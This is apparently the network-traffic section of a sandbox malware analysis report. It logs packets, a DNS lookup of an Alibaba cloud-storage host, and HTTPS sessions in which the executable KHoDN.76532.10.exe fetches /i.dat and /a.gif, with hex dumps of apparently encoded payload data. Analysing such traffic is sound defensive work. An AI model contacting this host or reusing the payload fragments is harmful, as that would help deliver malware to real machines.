Mar 23, 2025 03:16:04.386403084 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.386445045 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.386524916 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.386554956 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.386584044 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.386604071 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.386652946 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.386652946 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.386696100 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.386749029 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.386831045 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.596323967 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.596755981 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.629492998 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.629518032 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.629537106 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.629601002 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.629612923 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.629623890 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.629642963 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.629648924 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.629663944 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.629668951 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.629687071 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.629692078 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.629702091 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.629719019 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.629724026 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.629750013 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.629755020 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.629765034 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.629785061 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.629787922 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.629798889 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.629812002 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.629837990 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.629906893 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.839644909 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.839708090 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.839752913 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.839785099 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.839883089 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.839905977 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.839956045 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.839996099 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.840018988 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.840019941 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.840043068 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.840090036 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.840090036 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.840116024 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.840142965 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.840166092 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.840178967 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:04.840200901 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:04.840347052 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.048355103 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.048410892 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.142005920 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.142023087 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.142051935 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.142081022 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.142115116 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.142129898 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.142209053 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.142230034 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.142265081 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.142347097 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.142381907 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.142396927 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.142450094 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.142471075 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.142520905 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.348357916 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.348447084 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.417165995 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.417200089 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.417296886 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.417315960 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.417526007 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.417550087 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.417572975 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.417618036 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.417659998 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.417674065 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.417716980 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.417732954 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.417814970 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.417907953 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.624353886 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.624448061 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.773895979 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.773957968 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.774053097 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.774089098 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.774122000 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.774318933 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:05.774348974 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:05.774430990 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:06.122627020 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:06.614047050 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:07.275893927 CET	49736	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:07.275960922 CET	443	49736	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:07.489470959 CET	49737	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:07.489521027 CET	443	49737	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:07.489581108 CET	49737	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:07.489861012 CET	49737	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:07.489875078 CET	443	49737	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:08.455151081 CET	443	49737	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:08.455286026 CET	49737	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:08.458061934 CET	49737	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:08.458095074 CET	443	49737	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:08.461622953 CET	49737	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:08.461636066 CET	443	49737	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:08.790175915 CET	443	49737	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:08.790230036 CET	443	49737	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:08.790277004 CET	49737	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:08.790307045 CET	443	49737	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:08.790327072 CET	49737	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:08.790328979 CET	443	49737	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:08.790349960 CET	49737	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:08.790357113 CET	443	49737	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:08.790369987 CET	49737	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:08.790397882 CET	49737	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:08.796521902 CET	443	49737	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:08.796600103 CET	49737	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:08.801060915 CET	443	49737	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:08.801136971 CET	49737	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:08.805994034 CET	443	49737	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:08.806067944 CET	49737	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:08.809319973 CET	443	49737	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:08.809386015 CET	49737	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:08.812695980 CET	443	49737	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:08.812762022 CET	49737	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:08.812783003 CET	443	49737	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:08.812804937 CET	443	49737	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:08.812829971 CET	49737	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:08.812856913 CET	49737	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:08.889561892 CET	49737	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:08.889646053 CET	443	49737	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:08.916539907 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:08.916615963 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:08.916686058 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:08.917000055 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:08.917021990 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:09.877722979 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:09.877811909 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:09.878248930 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:09.878268003 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:09.878410101 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:09.878422022 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.203062057 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.203093052 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.203187943 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.203238010 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.203279972 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.203289986 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.203289986 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.203313112 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.203336954 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.203355074 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.203380108 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.203435898 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.519352913 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.519473076 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.519505024 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.519567966 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.519608974 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.519679070 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.519731045 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.519797087 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.519839048 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.519897938 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.835726976 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.835835934 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.835896969 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.835962057 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.836029053 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.836142063 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.836146116 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.836169004 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.836209059 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.836232901 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.836251020 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.836323977 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.838711977 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.838783026 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.838953972 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.839014053 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.839040041 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.839113951 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.839119911 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.839143038 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.839174032 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.839195013 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.839298964 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.839359999 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.839489937 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.839551926 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.839742899 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.839811087 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:10.840008020 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:10.840065956 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:11.151643038 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:11.151772022 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:11.151835918 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:11.151870966 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:11.151926994 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:11.151979923 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:11.151979923 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:11.151979923 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:11.152009964 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:11.152070999 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:11.152108908 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:11.152173996 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:11.152189016 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:11.152240992 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:11.152271986 CET	443	49738	39.103.20.80	192.168.2.5
Mar 23, 2025 03:16:11.152369022 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:11.153079987 CET	49738	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:16:11.153126001 CET	443	49738	39.103.20.80	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 23, 2025 03:15:46.342787027 CET	59279	53	192.168.2.5	1.1.1.1
Mar 23, 2025 03:15:46.685708046 CET	53	59279	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 23, 2025 03:15:46.342787027 CET	192.168.2.5	1.1.1.1	0x5d6f	Standard query (0)	f3rf3r.oss-cn-beijing.aliyuncs.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 23, 2025 03:15:46.685708046 CET	1.1.1.1	192.168.2.5	0x5d6f	No error (0)	f3rf3r.oss-cn-beijing.aliyuncs.com	sc-2jiu.cn-beijing.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 23, 2025 03:15:46.685708046 CET	1.1.1.1	192.168.2.5	0x5d6f	No error (0)	sc-2jiu.cn-beijing.oss-adns.aliyuncs.com	sc-2jiu.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 23, 2025 03:15:46.685708046 CET	1.1.1.1	192.168.2.5	0x5d6f	No error (0)	sc-2jiu.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com		39.103.20.80	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

f3rf3r.oss-cn-beijing.aliyuncs.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49732	39.103.20.80	443	8564	C:\Users\user\Desktop\KHoDN.76532.10.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-23 02:15:47 UTC	106	OUT	GET /i.dat HTTP/1.1 User-Agent: 3M Host: f3rf3r.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-03-23 02:15:48 UTC	557	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 23 Mar 2025 02:15:47 GMT Content-Type: application/octet-stream Content-Length: 512 Connection: close x-oss-request-id: 67DF6ED35423BA3139B5CBEE Accept-Ranges: bytes ETag: "2994726D480006FFF5081AA811BD3FEC" Last-Modified: Sun, 23 Mar 2025 01:38:44 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 8577957339141718951 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: KZRybUgABv/1CBqoEb0/7A== x-oss-server-time: 3
2025-03-23 02:15:48 UTC	512	IN	Data Raw: 07 1b 1b 1f 6c 25 30 30 56 03 42 56 65 24 78 39 4a 4a 14 5a 34 77 38 3f 56 55 56 51 36 7f 30 3d 54 44 48 53 30 20 7d 30 5f 5d 1f 51 7f 36 38 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 5f 43 43 47 34 7d 68 68 0e 5b 1a 0e 3d 7c 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 55 00 41 55 66 27 7b 3a 49 49 17 59 37 74 3b 3c 55 56 55 52 35 7c 33 3e 57 47 4b 50 33 23 7e 33 5c 5e 1c 50 7e 37 39 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 5e 42 42 46 35 7c 69 69 0f 5a 1b 0f 3c 7d 21 Data Ascii: l%00VBVe$x9JJZ4w8?VUVQ60=TDHS0 }0_]Q68777777777777777777777777777777777_CCG4}hh[=\| aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33UAUf'{:IIY7t;<UVUR5\|3>WGKP3#~3\^P~79666666666666666666666666666666666^BBF5\|iiZ<}!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49733	39.103.20.80	443	8564	C:\Users\user\Desktop\KHoDN.76532.10.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-23 02:15:49 UTC	106	OUT	GET /a.gif HTTP/1.1 User-Agent: 3M Host: f3rf3r.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-03-23 02:15:49 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 23 Mar 2025 02:15:49 GMT Content-Type: image/gif Content-Length: 140941 Connection: close x-oss-request-id: 67DF6ED55B40CC3830E4DDDE Accept-Ranges: bytes ETag: "7AF26B296715B679817DB8F2BC81CF61" Last-Modified: Sun, 23 Mar 2025 01:37:43 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 12013359422338491538 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: evJrKWcVtnmBfbjyvIHPYQ== x-oss-server-time: 2
2025-03-23 02:15:49 UTC	3550	IN	Data Raw: 42 4d 6a 08 00 00 00 00 00 00 36 00 00 00 28 00 00 00 21 00 00 00 15 00 00 00 01 00 18 00 00 00 00 00 34 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3d 68 98 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3a e2 2e 3a e2 2e 3a e2 2e 3a e2 2e 3a e2 2e 3a e2 2e 3a e2 2d 3a e2 46 51 e5 d9 db fa ff ff ff ff ff ff ff ff ff ff ff ff fd ed e3 f7 b7 8d f2 8c 48 f0 80 36 f0 80 36 f0 7f 36 f0 80 36 f0 7f 36 f0 80 36 f0 80 36 f0 80 36 00 2f 3d e0 2f 3b e3 2f 3b e3 2f 3b e3 2f 3b e3 2f 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e2 2e 3a e2 2e 3a e2 39 45 e4 b2 b7 f4 fe fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff fb f9 fc e4 d5 f9 cb ad f7 b9 91 f6 b1 83 f6 b1 84 f7 ba 91 f9 cb ad fc e5 d6 00 2f Data Ascii: BMj6(!4=h.;.;.;.;.;.;.;.:.:.:.:.:.:.:-:FQH66666666/=/;/;/;/;/;.;.;.;.;.;.;.;.;.;.:.:9E/
2025-03-23 02:15:49 UTC	4096	IN	Data Raw: 0b b5 b5 49 a2 a1 46 ba bb 37 b0 1d 73 c1 c1 f9 0b b0 d2 2d cc 71 c8 ca cb cc 32 db 75 2e d1 d2 58 d1 89 6e d6 d8 e2 1c af 37 56 db 8d 58 e0 e2 ab 6f b9 c2 d7 a0 62 9e cf d4 a5 6d 2b d0 ae 31 3f 38 bd 75 1b d0 11 bd 05 03 02 7b 3f 7f 0b ba fc fb fa 79 4f 8b cd 22 c8 44 8e ca 27 58 ee 37 bd df 14 16 db d4 51 93 47 38 15 49 57 a3 cd 02 6a af fd 6e ac d2 c1 3d d5 d3 d2 ab ef 4f 35 01 f3 df 24 73 04 f1 75 b1 f8 74 b6 e9 0c 89 be 57 6d 8f 44 46 0f c3 15 6e 7b 04 ce 8a 6f 0f 92 9e 9f 98 19 dd 95 10 d2 8b b2 e5 a2 a1 a0 ac 21 31 2b e7 89 46 2f e3 b0 82 bd 91 92 91 ea b0 0f 7b 3b ff be 89 62 71 b2 7b 7b 34 fe ba 5f db 42 4e 4f 48 cd 0f db ac 81 dd c3 0f 61 ae 04 4a d9 19 6a dc 10 5f e3 8e 71 3d 66 63 62 1b 5f de ac 29 70 ec 2e 69 58 bd 49 60 aa ac 46 ac 24 73 f9 Data Ascii: IF7s-q2u.Xn7VXobm+1?8u{?yO"D'X7QG8IWjn=O5$sutWmDFn{o!1+F/{;bq{{4_BNOHaJj_q=fcb_)p.iXI`F$s
2025-03-23 02:15:49 UTC	4096	IN	Data Raw: b0 fc 38 a3 fd ca b8 ba f2 37 73 56 a5 32 3e 3d 8b 49 d0 8d b5 c9 c9 83 40 02 25 e9 3e 2f 2e 9a 58 1a 2a c3 85 37 d9 da 93 57 98 6e 9e 1f 24 a6 d8 8c e9 e9 61 d8 14 15 14 a8 66 8a cb a0 bd 7f b7 d0 95 31 b2 68 fb fa fb fc b5 73 aa 00 32 cb fc 11 39 ba 06 08 41 87 1e 11 7f 0f 0f 59 9a dc 57 9f d5 fe d5 e9 e6 e5 5e 97 d9 56 92 35 31 50 22 24 6c ad e9 c0 99 db d4 d3 68 a5 28 78 bc 27 3d 46 34 36 7e b3 f7 d2 a5 cd c2 c1 7a 73 81 0a ce 51 89 21 46 48 00 c1 85 a4 c1 bf b0 af b8 04 52 54 55 12 dc 3c 7d 0a 13 d1 48 e5 38 61 61 2a ee 69 f9 01 66 68 81 8d 84 93 92 2b e4 b5 39 ff 66 c1 12 77 77 30 f2 b2 33 f7 a5 96 25 71 7e 7d c2 3c 8e 87 87 c8 c1 07 9e 21 ea 8f 8f d8 1a 59 7b d1 64 69 68 dd aa 5a d3 17 56 76 21 50 5e 5d eb 2f 6e 4e 11 47 56 55 98 7e e5 25 64 58 61 Data Ascii: 87sV2>=I@%>/.X7Wn$af1hs29AYW^V51P"$lh(x'=F46~zsQ!FHRTU<}H8aaifh+9fww03%q~}<!Y{dihZVv!P^]/nNGVU~%dXa
